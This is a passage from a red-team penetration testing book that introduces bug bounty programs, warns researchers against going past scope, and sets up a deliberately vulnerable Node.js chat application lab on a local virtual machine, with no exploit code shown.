moved to Layer 8 attacks focusing on social engineering (phishing) for our
initial entry point. Now, as we see organizations improving their internal
security with Next Generation Endpoint/Firewall Protection, our focus is shifting
back onto application exploitation. We have also seen a huge complexity
increase in applications, APIs, and languages, which has reopened many old and
even new vulnerabilities.

Since this book is geared more toward Red Teaming concepts, we will not go
too deeply into all of the different web vulnerabilities or how to manually exploit
them. This won't be your checklist style book. You will be focusing on
vulnerabilities that Red Teamers and bad guys are seeing in the real world,
which lead to the compromising of PII, IP, networks, and more. For those who
are looking for the very detailed web methodologies, I always recommend
starting with the OWASP Testing Guide (http://bit.ly/2GZbVZd and
https://www.owasp.org/images/1/19/OTGv4.pdf).

Note, since as many of the attacks from THP2 have not changed, we won't be
repeating examples like SQLMap, IDOR attacks, and CSRF vulnerabilities in
the following exercises. Instead, we will focus on newer critical ones.
Bug Bounty Programs:
Before we start learning how to exploit web applications, let’s talk a little about
bug bounty programs. The most common question we get is, “how can I
continually learn after these trainings?” My best recommendation is to do it
against real, live systems. You can do training labs all day, but without that real-
life experience, it is hard to grow.

One caveat though: on average, it takes about 3-6 months before you begin to
consistently find bugs. Our advice: don’t get frustrated, keep up-to-date with
other bug bounty hunters, and don’t forget to check out the older programs.

The more common bug bounty programs are HackerOne
(https://www.hackerone.com), BugCrowd (https://bugcrowd.com/programs) and
SynAck (https://www.synack.com/red-team/). There are plenty of other ones out
there as well (https://www.vulnerability-lab.com/list-of-bug-bounty-
programs.php). These programs can pay anywhere from Free to $20k+.

Many of my students find it daunting to start bug hunting. It really requires you
to just dive in, allot a few hours a day, and focus on understanding how to get
that sixth sense to find bugs. Generally, a good place to start is to look at No-
Reward Bug Bounty Programs (as the pros won’t be looking here) or at large
older programs like Yahoo. These types of sites tend to have a massive scope
and lots of legacy servers. As mentioned in prior books, scoping out pentests is
important and bug bounties are no different. Many of the programs specify what
can and cannot be done (i.e., no scanning, no automated tools, which domains
can be attacked, etc.). Sometimes you get lucky and they allow *.company.com,
but other times it might be limited to a single FQDN.

Let’s look at eBay, for example, as they have a public bug bounty program. On
their bug bounty site (http://pages.ebay.com/securitycenter/Researchers.html),
they state guidelines, eligible domains, eligible vulnerabilities, exclusions, how
to report, and acknowledgements:
How you report vulnerabilities to the company is generally just as important as
the finding itself. You want to make sure you provide the company with as
much detail as possible. This would include the type of vulnerability,
severity/criticality, what steps you took to exploit the vulnerability, screenshots,
and even a working proof of concept. If you need help creating consistent
reports, take a look at this report generation form:
https://buer.haus/breport/index.php.

Having run my own programs before, one thing to note about exploiting
vulnerabilities for bug bounty programs is that I have seen a few cases where
researchers got carried away and went past validating the vulnerability. Some
examples include dumping a whole database after finding an SQL injection,
defacing a page with something they thought was funny after a subdomain
takeover, and even laterally moving within a production environment after an
initial remote code execution vulnerability. These cases could lead to legal
trouble and to potentially having the Feds at your door. So use your best
judgement, check the scope of the program, and remember that if it feels illegal,
it probably is.
Web Attacks Introduction - Cyber Space Kittens
After finishing reconnaissance and discovery, you review all the different sites
you found. Looking through your results, you don’t see the standard exploitable
servers/misconfigured applications. There aren’t any Apache Tomcat servers or
Heartbleed/ShellShock, and it looks like they patched all the Apache Strut issues
and their CMS applications.

Your sixth sense intuition kicks into full gear and you start poking around at
their Customer Support System application. Something just doesn’t feel right,
but where to start?

For all the attacks in the Web Application Exploitation chapter, a custom THP3
VMWare Virtual Machine is available to repeat all these labs. This virtual
machine is freely available here:
http://thehackerplaybook.com/get.php?type=csk-web

To set up the demo for the Web Environment (Customer System Support):
Download the Custom THP VM from:
http://thehackerplaybook.com/get.php?type=csk-web
Download the full list of commands for the labs:
https://github.com/cheetz/THP-
ChatSupportSystem/blog/master/lab.txt
Bit.ly Link: http://bit.ly/2qBDrFo
Boot up and log into the VM
When the VM is fully booted, it should show you the current IP
address of the application. You do not need to log into the VM nor
is the password provided. It is up to you to break into the
application.
Since this is a web application hosted on your own system, let's make
a hostname record on our attacker Kali system:
On our attacker Kali VM, let's edit our host file to point to
our vulnerable application to reference the application by
hostname versus by IP:
gedit etchosts
Add the following line with the IP of your vulnerable
application:
[IP Address of Vuln App] chat
Now, go to your browser in Kali and go to
 http://chat:3000/. If everything worked, you should be
able to see the NodeJS Custom Vuln Application.

The commands and attacks for the web section can be extremely long and
complicated. To make it easy, I’ve included all the commands you’ll need for
each lab here:
https://github.com/cheetz/THP-ChatSupportSystem/blog/master/lab.txt

The Red Team Web Application Attacks
The first two books focused on how to efficiently and effectively test Web
Applications – this time will be a little different. We are going to skip many of
the basic attacks and move into attacks that are used in the real world.

Since this is more of a practical book, we won’t go into all of the detailed
technicalities of web application testing. However, this doesn’t mean that these
details should be ignored. A great resource for web application testing
information is Open Web Application Security Project, or OWASP. OWASP
focuses on developing and educating users on application security. Every few
years, OWASP compiles a list of the most common issues and publishes them to
the public - http://bit.ly/2HAhoGR. A more in-depth testing guideline is located
here: http://bit.ly/2GZbVZd. This document will walk you through the types of
vulnerabilities to look for, the risks, and how to exploit them. This is a great
checklist document: http://bit.ly/2qyA9m1.

As many of my readers are trying to break into the security field, I wanted to
quickly mention one thing: if you are going for a penetration testing job, it is
imperative to know, at a minimum, the OWASP Top 10 backwards and
forwards. You should not only know what they are, but also have good
examples for each one in terms of the types of risks they bring and how to check
for them. Now, let's get back to compromising CSK.

Chat Support Systems Lab
The Chat Support System lab that will be attacked was built to be interactive and
highlight both new and old vulnerabilities. As you will see, for many of the
following labs, we provide a custom VM with a version of the Chat Support
System.
The application itself was written in Node.js. Why Node?